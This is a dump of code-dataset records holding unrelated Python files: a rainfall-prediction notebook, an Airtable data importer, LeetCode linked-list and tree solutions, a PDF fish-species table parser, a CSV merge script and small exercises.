In[16]:\n\n\n\nplt.figure(figsize=(15,8))\ndata.groupby(\"YEAR\").sum()['ANNUAL'].plot(kind=\"line\",color=\"r\",marker=\".\")\nplt.xlabel(\"YEARS\",size=12)\nplt.ylabel(\"RAINFALL IN MM\",size=12)\nplt.grid(axis=\"both\",linestyle=\"-.\")\nplt.title(\"Rainfall over Years\")\nplt.show()\n\n\n# In[17]:\n\n\ndata[['YEAR', 'JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL','AUG', 'SEP',\n 'OCT', 'NOV', 'DEC']].groupby(\"YEAR\").sum().plot(kind=\"line\",figsize=(18,8))\nplt.xlabel(\"Year\",size=13)\nplt.ylabel(\"Rainfall in MM\",size=13)\nplt.title(\"Year v/s Rainfall in each month\",size=20)\nplt.show()\n\n\n# In[18]:\n\n\ndata[['YEAR','Jan-Feb', 'Mar-May',\n 'Jun-Sep', 'Oct-Dec']].groupby(\"YEAR\").sum().plot(figsize=(10,7))\nplt.xlabel(\"Year\",size=13)\nplt.ylabel(\"Rainfall in MM\",size=13)\nplt.show()\n\n\n# In[19]:\n\n\ndata[['SUBDIVISION', 'JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL',\n 'AUG', 'SEP', 'OCT', 'NOV', 'DEC']].groupby(\"SUBDIVISION\").sum().plot(kind=\"barh\",stacked=True,figsize=(13,8))\nplt.title(\"Sub-Division v/s Rainfall in each month\")\nplt.xlabel(\"Rainfall in MM\",size=12)\nplt.ylabel(\"Sub-Division\",size=12)\nplt.grid(axis=\"x\",linestyle=\"-.\")\nplt.show()\n\n\n# In[20]:\n\n\ndata[['SUBDIVISION', 'Jan-Feb', 'Mar-May',\n 'Jun-Sep', 'Oct-Dec']].groupby(\"SUBDIVISION\").sum().plot(kind=\"barh\",stacked=True,figsize=(16,8))\nplt.xlabel(\"Rainfall in MM\",size=12)\nplt.ylabel(\"Sub-Division\",size=12)\nplt.grid(axis=\"x\",linestyle=\"-.\")\nplt.show()\n\n\n# In[21]:\n\n\nTN = data.loc[((data['SUBDIVISION'] == 'TAMIL NADU'))]\nTN.head(4)\n\n\n# In[22]:\n\n\nTN[['JAN', 'FEB', 'MAR', 'APR','MAY', 'JUN','JUL','AUG', 'SEP', 'OCT','NOV','DEC']].mean().plot(kind=\"bar\",width=0.5,linewidth=2)\nplt.title(\"Tamil Nadu Rainfall v/s Months\",size=20)\nplt.xlabel(\"Months\",size=14)\nplt.ylabel(\"Rainfall in MM\",size=14)\nplt.grid(axis=\"both\",linestyle=\"-.\")\nplt.show()\n\n\n# In[23]:\n\n\n\nTN.groupby(\"YEAR\").sum()['ANNUAL'].plot(ylim=(50,1500),color='r',marker='o',linestyle='-',linewidth=2,figsize=(12,8));\nplt.xlabel('Year',size=14)\nplt.ylabel('Rainfall in MM',size=14)\nplt.title('Tamil Nadu Annual Rainfall from Year 1901 to 2015',size=20)\nplt.grid()\nplt.show()\n\n\n# In[24]:\n\n\nRajasthan = data.loc[((data['SUBDIVISION'] == 'WEST RAJASTHAN') | (data['SUBDIVISION'] == 'EAST RAJASTHAN'))]\nRajasthan.head()\n\n\n# In[25]:\n\n\n\nplt.figure(figsize=(10,6))\nRajasthan[['JAN', 'FEB', 'MAR', 'APR','MAY', 'JUN','JUL','AUG', 'SEP', 'OCT','NOV','DEC']].mean().plot(kind=\"bar\",width=0.5,linewidth=2)\nplt.title(\"Rajasthan Rainfall v/s Months\",size=20)\nplt.xlabel(\"Months\",size=14)\nplt.ylabel(\"Rainfall in MM\",size=14)\nplt.grid(axis=\"both\",linestyle=\"-.\")\nplt.show()\n\n\n# In[26]:\n\n\nRajasthan.groupby(\"YEAR\").mean()['ANNUAL'].plot(ylim=(50,1500),color='r',marker='o',linestyle='-',linewidth=2,figsize=(12,8));\nplt.xlabel('Year',size=14)\nplt.ylabel('Rainfall in MM',size=14)\nplt.title('Rajasthan Annual Rainfall from Year 1901 to 2015',size=20)\nplt.grid()\nplt.show()\n\n\n# In[27]:\n\n\nplt.figure(figsize=(15,6))\nsns.heatmap(data[['JAN','FEB','MAR','APR','MAY','JUN','JUL','AUG','SEP','OCT','NOV','DEC','ANNUAL']].corr(),annot=True)\nplt.show()\n\n\n# In[28]:\n\n\ndata[\"SUBDIVISION\"].nunique()\n\n\n# In[29]:\n\n\n\ngroup = data.groupby('SUBDIVISION')['YEAR','JAN','FEB','MAR','APR','MAY','JUN','JUL','AUG','SEP','OCT','NOV','DEC']\ndata=group.get_group(('TAMIL NADU'))\ndata.head()\n\n\n# In[31]:\n\n\n\ndf=data.melt(['YEAR']).reset_index()\ndf.head()\n\n\n# In[32]:\n\n\ndf= df[['YEAR','variable','value']].reset_index().sort_values(by=['YEAR','index'])\ndf.head()\n\n\n# In[33]:\n\n\n\ndf.YEAR.unique()\n\n\n# In[34]:\n\n\ndf.columns=['Index','Year','Month','Avg_Rainfall']\n\n\n# In[35]:\n\n\ndf.head()\n\n\n# In[36]:\n\n\nMonth_map={'JAN':1,'FEB':2,'MAR' :3,'APR':4,'MAY':5,'JUN':6,'JUL':7,'AUG':8,'SEP':9,\n 'OCT':10,'NOV':11,'DEC':12}\ndf['Month']=df['Month'].map(Month_map)\ndf.head(12)\n\n\n# In[37]:\n\n\ndf.drop(columns=\"Index\",inplace=True)\n\n\n# In[38]:\n\n\ndf.head(2)\n\n\n# In[39]:\n\n\ndf.groupby(\"Year\").sum().plot()\nplt.show()\n\n\n# In[40]:\n\n\nX=np.asanyarray(df[['Year','Month']]).astype('int')\ny=np.asanyarray(df['Avg_Rainfall']).astype('int')\nprint(X.shape)\nprint(y.shape)\n\n\n# In[41]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=10)\n\n\n# In[42]:\n\n\n#Linear Regression Model\nfrom sklearn.linear_model import LinearRegression\nLR = LinearRegression()\nLR.fit(X_train,y_train)\n\n\n# In[43]:\n\n\n## predicting\ny_train_predict=LR.predict(X_train)\ny_test_predict=LR.predict(X_test)\n\n\n# In[44]:\n\n\n\n#Linear Regression Model\nprint(\"-------Test Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_test, y_test_predict))\nprint('MSE:', metrics.mean_squared_error(y_test, y_test_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_test_predict)))\n\nprint(\"\\n-------Train Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_train,y_train_predict))\nprint('MSE:', metrics.mean_squared_error(y_train, y_train_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, y_train_predict)))\n\nprint(\"\\n-----Training Accuracy-------\")\nprint(round(LR.score(X_train,y_train),3)*100)\nprint(\"-----Testing Accuracy--------\")\nprint(round(LR.score(X_test,y_test),3)*100)\n\n\n# In[45]:\n\n\n# Lasso Model\nfrom sklearn.linear_model import Lasso\nfrom sklearn.model_selection import GridSearchCV\n\n# create a lasso object\nlasso = Lasso(max_iter=100000)\n\n# check for best alpha value using GridSearch\nparameter={'alpha':[1e-15,1e-10,1e-8,1e-3,1e-2,1,5,1e1,1e2,1e3,1e4,1e5,1e6,1e7]}\nlasso_regressor=GridSearchCV(\n lasso,parameter,\n scoring='neg_mean_squared_error',\n cv=5\n )\n\n\n# In[46]:\n\n\n\nlasso_regressor.fit(X_train,y_train)\n\n\n# In[47]:\n\n\n\nprint(\"Best Parameter for Lasso:\",lasso_regressor.best_estimator_)\n\n\n# In[48]:\n\n\nlasso=Lasso(alpha=100.0,max_iter=100000)\n\n# fit into the object\nlasso.fit(X_train,y_train)\n\n\n# In[49]:\n\n\n# predicting\ny_train_predict=lasso.predict(X_train)\ny_test_predict=lasso.predict(X_test)\n\n\n# In[50]:\n\n\n#lasso regression\nfrom sklearn import metrics\nprint(\"-------Test Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_test, y_test_predict))\nprint('MSE:', metrics.mean_squared_error(y_test, y_test_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_test_predict)))\n\nprint(\"\\n-------Train Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_train,y_train_predict))\nprint('MSE:', metrics.mean_squared_error(y_train, y_train_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, y_train_predict)))\n\nprint(\"\\n-----Training Accuracy-------\")\nprint(round(lasso.score(X_train,y_train),3)*100)\nprint(\"-----Testing Accuracy--------\")\nprint(round(lasso.score(X_test,y_test),3)*100)\n\n\n# In[51]:\n\n\n# Ridge Model\nfrom sklearn.linear_model import Ridge\nfrom sklearn.model_selection import GridSearchCV\n \nridge=Ridge()\nparameters={'alpha':[1e-15,1e-10,1e-8,1e-3,1e-2,1,5,10,20,30,35,40,45,50,55,100]}\nridge_regressor=GridSearchCV(ridge,parameters,scoring='neg_mean_squared_error',cv=5)\nridge_regressor.fit(X_train,y_train)\n\nprint(ridge_regressor.best_params_)\nprint(ridge_regressor.best_score_)\n\n\n# In[52]:\n\n\n\nprint(\"Best Parameter for Ridge:\",ridge_regressor.best_estimator_)\n\n\n# In[53]:\n\n\n\nridge=Ridge(alpha=100.0)\n\n# fit into the object\nridge.fit(X_train,y_train)\n\n\n# In[54]:\n\n\n# predicting\ny_train_predict=ridge.predict(X_train)\ny_test_predict=ridge.predict(X_test)\n\n\n# In[55]:\n\n\n# Ridge Model\nfrom sklearn import metrics\nprint(\"-------Test Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_test, y_test_predict))\nprint('MSE:', metrics.mean_squared_error(y_test, y_test_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_test_predict)))\n\nprint(\"\\n-------Train Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_train,y_train_predict))\nprint('MSE:', metrics.mean_squared_error(y_train, y_train_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, y_train_predict)))\n\nprint(\"\\n-----Training Accuracy-------\")\nprint(round(ridge.score(X_train,y_train),3)*100)\nprint(\"-----Testing Accuracy--------\")\nprint(round(ridge.score(X_test,y_test),3)*100)\n\n\n# In[56]:\n\n\n#SVC\nfrom sklearn import preprocessing\nfrom sklearn import svm\n\nsvm_regr = svm.SVC(kernel='rbf')\nsvm_regr.fit(X_train, y_train)\n\n\n# In[57]:\n\n\n\ny_test_predict = svm_regr.predict(X_test)\ny_train_predict = svm_regr.predict(X_train)\n\n\n# In[58]:\n\n\n#SVC\nfrom sklearn import metrics\nprint(\"-------Test Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_test, y_test_predict))\nprint('MSE:', metrics.mean_squared_error(y_test, y_test_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_test_predict)))\n\nprint(\"\\n-------Train Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_train,y_train_predict))\nprint('MSE:', metrics.mean_squared_error(y_train, y_train_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, y_train_predict)))\n\n\nprint(\"\\n-----Training Accuracy-------\")\nprint(round(svm_regr.score(X_train,y_train),3)*100)\nprint(\"-----Testing Accuracy--------\")\nprint(round(svm_regr.score(X_test,y_test),3)*100)\n\n\n# In[59]:\n\n\n# Random Forest Model\nfrom sklearn.ensemble import RandomForestRegressor\nrandom_forest_model = RandomForestRegressor(max_depth=100, max_features='sqrt', min_samples_leaf=4,\n min_samples_split=10, n_estimators=800)\nrandom_forest_model.fit(X_train, y_train)\n\n\n# In[60]:\n\n\ny_train_predict=random_forest_model.predict(X_train)\ny_test_predict=random_forest_model.predict(X_test)\n\n\n# In[61]:\n\n\n# Random Forest Model\nprint(\"-------Test Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_test, y_test_predict))\nprint('MSE:', metrics.mean_squared_error(y_test, y_test_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_test, y_test_predict)))\n\nprint(\"\\n-------Train Data--------\")\nprint('MAE:', metrics.mean_absolute_error(y_train,y_train_predict))\nprint('MSE:', metrics.mean_squared_error(y_train, y_train_predict))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(y_train, y_train_predict)))\n\n\n# In[62]:\n\n\nprint(\"-----------Training Accuracy------------\")\nprint(round(random_forest_model.score(X_train,y_train),3)*100)\nprint(\"-----------Testing Accuracy------------\")\nprint(round(random_forest_model.score(X_test,y_test),3)*100)\n\n\n# In[63]:\n\n\n\npredicted = random_forest_model.predict([[2016,11]])\n\n\n# In[64]:\n\n\npredicted\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Rainfall-Prediction .py","file_name":"Rainfall-Prediction .py","file_ext":"py","file_size_in_byte":11262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"494837501","text":"#angka1, angka2, angka3 = input().split()\n\n\"\"\"\nwith open(\"data.txt\", \"w\") as f:\n\tf.write(str(angka)) #str = membuat int jadi string\n\"\"\"\n\ndaftarNilai = []\n\nfor i in range(6):\n\tdata = input()\n\tdaftarNilai.append(data)\n\nwith open(\"data.txt\", \"a\") as f:\n\tfor nilai in daftarNilai:\n\t\tf.write(str(nilai+\"\\n\"))\n","sub_path":"Learning step/Basic/belajarWrite.py","file_name":"belajarWrite.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210767092","text":"from sqlalchemy_api_handler import humanize\nfrom utils.config import COMMAND_NAME, API_URL, IS_DEVELOPMENT\nfrom utils.date import strptime\n\nfrom models.appearance import Appearance\nfrom models.author_content import AuthorContent\nfrom models.claim import Claim\nfrom models.review import Review\nfrom models.content import Content\nfrom models.medium import Medium\nfrom models.organization import Organization\nfrom models.role import Role, RoleType\nfrom models.user import User\nfrom models.verdict import Verdict, PostType\nfrom utils.config import APP_NAME, DEFAULT_USER_PASSWORD, TLD\nfrom utils.random_token import create_random_password\n\n\ndef appearance_from_row(row, unused_index=None):\n reviewed_items = row.get('Item reviewed')\n if not reviewed_items:\n return None\n\n quoting_content = Content.create_or_modify({\n '__SEARCH_BY__': 'url',\n 'url': row['url'].strip()\n })\n medium_science_feedback_ids = row.get('Outlet')\n if medium_science_feedback_ids:\n medium = Medium.query.filter_by(\n scienceFeedbackIdentifier=medium_science_feedback_ids[0]).first()\n quoting_content.mediumId = medium.id\n\n author_science_feedback_ids = row.get('Authors')\n if author_science_feedback_ids:\n for author_science_feedback_id in author_science_feedback_ids:\n author = User.query.filter_by(\n scienceFeedbackIdentifier=author_science_feedback_id).first()\n author_content = AuthorContent.create_or_modify({\n '__SEARCH_BY__': ['authorId', 'contentId'],\n 'authorId': humanize(author.id),\n 'contentId': humanize(quoting_content.id)\n })\n quoting_content.authorContents = quoting_content.authorContents + [author_content]\n\n quoted_claim = Claim.query.filter_by(\n scienceFeedbackIdentifier=reviewed_items[0]).first()\n quoted_content = None\n if not quoted_claim:\n quoted_content = Content.query.filter_by(\n scienceFeedbackIdentifier=reviewed_items[0]).first()\n if not quoted_claim and not quoted_content:\n return None\n\n testifier_science_feedback_ids = row.get('Verified by')\n if not testifier_science_feedback_ids:\n return None\n testifier = User.query.filter_by(\n scienceFeedbackIdentifier=testifier_science_feedback_ids[0]).first()\n if not testifier:\n return None\n\n if IS_DEVELOPMENT:\n quoting_content.externalThumbUrl = API_URL + '/static/logo.png' if IS_DEVELOPMENT else None\n quoting_content.title = \"/\".join(quoting_content.url\n .replace('http://', '') \\\n .replace('https://', '') \\\n .split('/')[-2:]) \\\n .replace('-', ' ')\n\n appearance_dict = {\n '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n 'quotedClaim': quoted_claim,\n 'quotedContent': quoted_content,\n 'quotingContent': quoting_content,\n 'scienceFeedbackIdentifier': row['airtableId'],\n 'testifier': testifier\n }\n\n return Appearance.create_or_modify(appearance_dict)\n\n\ndef author_from_row(row, index=None):\n chunks = row.get('Name', '').split(' ')\n first_name = '{}test'.format(COMMAND_NAME).title() if IS_DEVELOPMENT \\\n else chunks[0]\n last_name = 'Author{}'.format(index) if IS_DEVELOPMENT \\\n else ' '.join(chunks[1:]).replace('\\'', '')\n user_dict = {\n '__SEARCH_BY__': 'email',\n 'email': '{}.{}@{}.{}'.format(\n first_name.lower(),\n last_name.lower(),\n APP_NAME,\n TLD),\n 'firstName': first_name,\n 'lastName': last_name,\n 'scienceFeedbackIdentifier': row['airtableId']\n }\n\n user = User.create_or_modify(user_dict)\n if not user.id:\n user.set_password(DEFAULT_USER_PASSWORD if IS_DEVELOPMENT else create_random_password())\n\n role = Role.create_or_modify({\n '__SEARCH_BY__': ['type', 'userId'],\n 'type': RoleType.AUTHOR,\n 'userId': humanize(user.id)\n })\n user.roles = user.roles + [role]\n\n return user\n\n\ndef claim_from_row(row, unused_index=None):\n text = row.get('Claim checked (or Headline if no main claim)')\n if not text:\n return None\n\n claim_dict = {\n '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n 'scienceFeedbackIdentifier': row['airtableId'],\n 'text': text\n }\n\n return Claim.create_or_modify(claim_dict)\n\n\ndef editor_from_row(row, index=None):\n chunks = row.get('Name', '').split(' ')\n first_name = '{}test'.format(COMMAND_NAME).title() if IS_DEVELOPMENT \\\n else chunks[0]\n last_name = 'Editor{}'.format(index) if IS_DEVELOPMENT \\\n else ' '.join(chunks[1:]).replace('\\'', '')\n user_dict = {\n '__SEARCH_BY__': 'email',\n 'email': '{}.{}@{}.{}'.format(\n first_name.lower(),\n last_name.lower(),\n APP_NAME,\n TLD),\n 'firstName': first_name,\n 'lastName': last_name,\n 'scienceFeedbackIdentifier': row['airtableId']\n }\n\n user = User.create_or_modify(user_dict)\n if not user.id:\n user.set_password(DEFAULT_USER_PASSWORD if IS_DEVELOPMENT else create_random_password())\n\n role = Role.create_or_modify({\n '__SEARCH_BY__': ['type', 'userId'],\n 'type': RoleType.EDITOR,\n 'userId': humanize(user.id)\n })\n user.roles = user.roles + [role]\n\n return user\n\n\ndef outlet_from_row(row, unused_index=None):\n medium_dict = {\n '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n 'name': row['Name'],\n 'scienceFeedbackIdentifier': row['airtableId']\n }\n\n return Medium.create_or_modify(medium_dict)\n\n\ndef review_from_row(row, unused_index=None):\n science_feedback_reviewer_ids = row.get('Review editor(s)')\n if not science_feedback_reviewer_ids:\n return None\n reviewer = User.query.filter_by(\n scienceFeedbackIdentifier=science_feedback_reviewer_ids[0]).first()\n if not reviewer:\n return None\n\n claim = Claim.query.filter_by(\n scienceFeedbackIdentifier=row['Items reviewed'][0]).first()\n if not claim:\n return None\n\n review_dict = {\n '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n 'claim': claim,\n 'scienceFeedbackIdentifier': row['airtableId'],\n 'reviewer': reviewer\n }\n\n return Review.create_or_modify(review_dict)\n\n\ndef reviewer_from_row(row, index=None):\n first_name = '{}test'.format(COMMAND_NAME).title() if IS_DEVELOPMENT \\\n else row['First name']\n last_name = 'Reviewer{}'.format(index) if IS_DEVELOPMENT \\\n else row['Last name']\n user_dict = {\n '__SEARCH_BY__': 'email',\n 'email': '{}.{}@{}.{}'.format(\n first_name.lower(),\n last_name.lower(),\n APP_NAME,\n TLD) if IS_DEVELOPMENT else row['Email'],\n 'firstName': first_name,\n 'lastName': last_name,\n 'scienceFeedbackIdentifier': row['airtableId']\n }\n\n user = User.create_or_modify(user_dict)\n if not user.id:\n user.set_password(DEFAULT_USER_PASSWORD if IS_DEVELOPMENT else create_random_password())\n\n role = Role.create_or_modify({\n '__SEARCH_BY__': ['type', 'userId'],\n 'type': RoleType.REVIEWER,\n 'userId': humanize(user.id)\n })\n user.roles = user.roles + [role]\n\n return user\n\n\ndef social_from_row(row, unused_index=None):\n if row.get('url') is None:\n return None\n\n organization_name = row['url'].replace('https://www.', '') \\\n .split('/')[0] \\\n .split('.')[0] \\\n .title()\n organization = Organization.create_or_modify({\n '__SEARCH_BY__': 'name',\n 'name': organization_name\n })\n\n medium_dict = {\n '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n 'name': row['Name'],\n 'organization': organization,\n 'scienceFeedbackIdentifier': row['airtableId'],\n 'url': row['url']\n }\n\n return Medium.create_or_modify(medium_dict)\n\n\ndef verdict_from_row(row, unused_index=None):\n science_feedback_editor_ids = row.get('Review editor(s)')\n if not science_feedback_editor_ids:\n return None\n editor = User.query.filter_by(scienceFeedbackIdentifier=science_feedback_editor_ids[0]).first()\n if not editor:\n return None\n\n claim = Claim.query.filter_by(scienceFeedbackIdentifier=row['Items reviewed'][0]).first()\n if not claim:\n return None\n\n medium = Medium.query.filter_by(url='/'.join(row['Review url'].split('/')[0:3])).first()\n published_date = strptime(row['Date of publication'], '%Y-%m-%d')\n post_type = row['Post type'].lower()\n\n verdict_dict = {\n '__SEARCH_BY__': 'scienceFeedbackIdentifier',\n 'claim': claim,\n 'editor': editor,\n 'medium': medium,\n 'scienceFeedbackIdentifier': row['airtableId'],\n 'scienceFeedbackUrl': row['Review url'],\n 'scienceFeedbackPublishedDate': published_date,\n 'title': row['Review headline'],\n 'type': PostType._value2member_map_[post_type]\n }\n\n return Verdict.create_or_modify(verdict_dict)\n","sub_path":"api/repository/science_feedback/airtable/entity_from_row.py","file_name":"entity_from_row.py","file_ext":"py","file_size_in_byte":9368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646521358","text":"\"\"\"\n92. Reverse Linked List II\n\n\nReverse a linked list from position m to n. Do it in one-pass.\n\nNote: 1 ≤ m ≤ n ≤ length of list.\n\nExample:\n\nInput: 1->2->3->4->5->NULL, m = 2, n = 4\nOutput: 1->4->3->2->5->NULL\n\n\"\"\"\n\n\nclass ReverseBetween:\n\n \"\"\"\n Approach 1: Recursion\n Intuition\n\n The idea for linked list reversal using recursion springs from a similar idea that we use for reversing an array. If we want to reverse an array, the huge advantage that we have is the availability of indexes. \n So, what we can do there is to simply have two pointers, one at the beginning of the array and one at the end. We repeatedly swap elements pointed to by these two pointers and we move both the pointers towards the center of the array. \n Let's quickly look at this simple algorithm on a sample array before we move on to linked lists.\n\n Algorithm\n\n We define a recursion function that will do the job of reversing a portion of the linked list.\n Let's call this function recurse. The function takes in 3 parameters: m being the starting point of the reversal, n being the ending point for the reversal, and a pointer right which will start at the n^{th}n \n th\n node in the linked list and move backwards with the backtracking of the recursion. If this is not clear at the moment, the diagrams that follow will help.\n Additionally, we have a pointer called left which starts from the m^{th}m \n th\n node in the linked list and moves forward. In Python, we have to take a global variable for this which get's changed with recursion. In other languages, where changes made in function calls persist, we can consider this pointer as an additional variable for the function recurse.\n In a recursion call, given m, n, and right, we check if n == 1. If this is the case, we don't need to go any further.\n Until we reach n = 1, we keep moving the right pointer one step forward and after doing that, we make a recursive call with the value of n decreased by 1. At the same time, we keep on moving the left pointer forward until m == 1. When we refer to a pointer being moved forward, it essentially means pointer.next.\n So we backtrack as soon as n reaches 1. At that point of time, the right pointer is at the last node of the sublist we want to reverse and the left has already reached the first node of this sublist. So, we swap out the data and move the left pointer one step forward using left = left.next. We need this change to persist across the backtracking process.\n From there on, every time we backtrack, the right pointer moves one step backwards. This is the simulation we've been mentioning all along. The backward movement is simulated by backtracking.\n We stop the swaps when either right == left, which happens if the sublist size is odd, or, right.next == left which happens when during the backtracking process for an even sized sublist, the right pointer crosses left. We use a global boolean flag for stopping the swaps once these conditions are met.\n Let's look at a series of diagrams explaining the process on a sample linked list. Hopefully, things would be clearer after this.\n\n Complexity Analysis\n\n Time Complexity: O(N) considering the list consists of NN nodes. We process each of the nodes at most once (we don't process the nodes after the n node from the beginning.\n Space Complexity: O(1) since we simply adjust some pointers in the original linked list and only use O(1)O(1) additional memory for achieving the final result.\n\n \"\"\"\n def doit_(self, head, m, n):\n \"\"\"\n :type head: ListNode\n :type m: int\n :type n: int\n :rtype: ListNode\n \"\"\"\n\n # Empty list\n if not head:\n return None\n\n # Move the two pointers until they reach the proper starting point\n # in the list.\n cur, prev = head, None\n while m > 1:\n prev = cur\n cur = cur.next\n m, n = m - 1, n - 1\n\n # The two pointers that will fix the final connections.\n tail, con = cur, prev\n\n # Iteratively reverse the nodes until n becomes 0.\n # don't use cur, cur.next, prev = cur.next, prev, cur, it has variable assignment issues.\n while n:\n third = cur.next\n cur.next = prev\n prev = cur\n cur = third\n n -= 1\n\n # Adjust the final connections as explained in the algorithm\n if con:\n con.next = prev\n else:\n head = prev\n tail.next = cur\n return head\n\n def doit_(self, head, m, n):\n \"\"\"\n :type head: ListNode\n :type m: int\n :type n: int\n :rtype: ListNode\n \"\"\"\n preHead = ListNode(1000)\n pt, preHead.next, i, = preHead, head, 1\n while pt and i < m:\n pt = pt.next\n i += 1\n\n pStart, pEnd = pt.next, pt\n while pStart and i < n:\n p = pStart.next\n pStart.next = p.next\n p.next = pEnd.next \n pEnd.next = p\n i += 1\n\n return preHead.next","sub_path":"PythonLeetcode/leetcodeM/92_ReverseLinkedListII.py","file_name":"92_ReverseLinkedListII.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61577602","text":"import re\nfrom glob import glob\nfrom os.path import basename, join\n\nimport pandas as pd\nimport tabula\n\nimport tools.HelperFunction as hp\n\nclass AppendixSpecies(object):\n def __init__(self, file):\n self.file = file\n self.year = int(basename(self.file)[:4])\n self.pdf = tabula.read_pdf(self.file, encoding='utf-8', spreadsheet=True, \n output_format=\"tsv\", silent=True, \n multiple_tables=True, pages=\"all\")\n\n def dirtyWork(self):\n page = 0\n table = pd.DataFrame()\n while page < len(self.pdf):\n num = self.pdf[page].iloc[1:, 0].astype(str).str.replace(\" \",\"\")\n che = self.pdf[page].iloc[1:, 1].str.replace(\" \", \"\").str.replace(\"\\r\", \" \")\n eng = self.pdf[page].iloc[1:, 2].str.replace(\"\\r\", \" \")\n scn = self.pdf[page].iloc[1:, 3].str.replace(\"\\r\", \" \")\n ccn = self.pdf[page].iloc[1:, 4].str.replace(\" \", \"\").str.replace(\"\\r\", \" \").str.replace(\" \", \"\")\n\n tmp = pd.concat([num, che, eng, scn, ccn], axis=1) \n\n table = pd.concat([table, tmp], ignore_index=True)\n page += 1\n\n table = table.T.reset_index(drop=True).T\n \n table.rename(columns={0: \"species_code\", 1: \"chinese_name\", 2: \"english_name\", 3: \"scientific_name\", 4: \"common_name\"}, inplace=True)\n \n table.insert(loc=0, column='year', value=self.year)\n \n table = table[table['species_code'].str.contains(\"[0-9]\")]\n\n if self.year <= 2013:\n table['species_code'] = table['species_code'].astype(str).str.zfill(4)\n else:\n table['species_code'] = table['species_code'].astype(str).str.zfill(5)\n\n return table\n\ndef main():\n file_list = glob(\"./raw/附錄_魚類名代碼/*\")\n\n df = pd.DataFrame()\n for file in file_list: \n print(file)\n f = AppendixSpecies(file) \n final = f.dirtyWork() \n df = pd.concat([final, df]).sort_values(by=['year', 'species_code'])\n \n df.rename(columns={\"year\": \"年份\",\n \"species_code\": \"魚種代碼\", \n \"chinese_name\": \"魚種中文名\", \n \"english_name\": \"魚種英文名\",\n \"scientific_name\": \"魚種學名\",\n \"common_name\": \"魚種俗名\"\n }, inplace=True)\n \n df.to_csv('./results/附錄_魚類名代碼.csv', index=False)\n\nif __name__ == \"__main__\":\n main()\n \n","sub_path":"scripts/appendix_species.py","file_name":"appendix_species.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519328871","text":"\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, val=0, left=None, right=None):\r\n# self.val = val\r\n# self.left = left\r\n# self.right = right\r\nclass Solution:\r\n def maxDepth(self, root: TreeNode) -> int:\r\n \r\n if root is None:\r\n return 0\r\n tree= [root]\r\n depth = 0\r\n while tree:\r\n depth += 1\r\n for i in range(len(tree)):\r\n temp = tree.pop(0)\r\n if temp.left:\r\n tree.append(temp.left)\r\n if temp.right:\r\n tree.append(temp.right)\r\n return depth\r\n \r\n \r\n ","sub_path":"104_maximum_depth_binary_tree.py","file_name":"104_maximum_depth_binary_tree.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"286789650","text":"import pandas as pd\nimport glob\n\nif __name__ == '__main__':\n path = r'C:\\Users\\kwaneung\\Documents\\GitHub\\FinTec\\경제지표'\n allFiles = glob.glob(path + '/*.csv')\n frame = pd.read_csv('^KS11.csv', encoding='CP949')\n list_ = []\n cnt = 0\n\n for file_ in allFiles:\n print(\"read \" + file_)\n df = pd.read_csv(file_, encoding='CP949')\n frame = pd.merge(frame, df, on='DATE')\n\n frame = frame.dropna()\n frame = frame.set_index('DATE')\n frame.to_csv(\"KOSPI_FRAME.csv\", encoding='CP949')\n\n corr = frame.corr(method='pearson') # 상관계수\n corr.to_csv('corr.csv', encoding='CP949')","sub_path":"Kospi_v3/Merge.py","file_name":"Merge.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"113877033","text":"# N과 M (1)\nN, M = map(int, input().split())\nvisited = [0]*N\narr = range(1, N+1)\ntemp = [0]*M\n\n\ndef perm(k):\n if k == M:\n for t in temp:\n print(t, end=' ')\n print()\n else:\n for i in range(N):\n if visited[i]:\n continue\n temp[k] = arr[i]\n visited[i] = 1\n perm(k + 1)\n visited[i] = 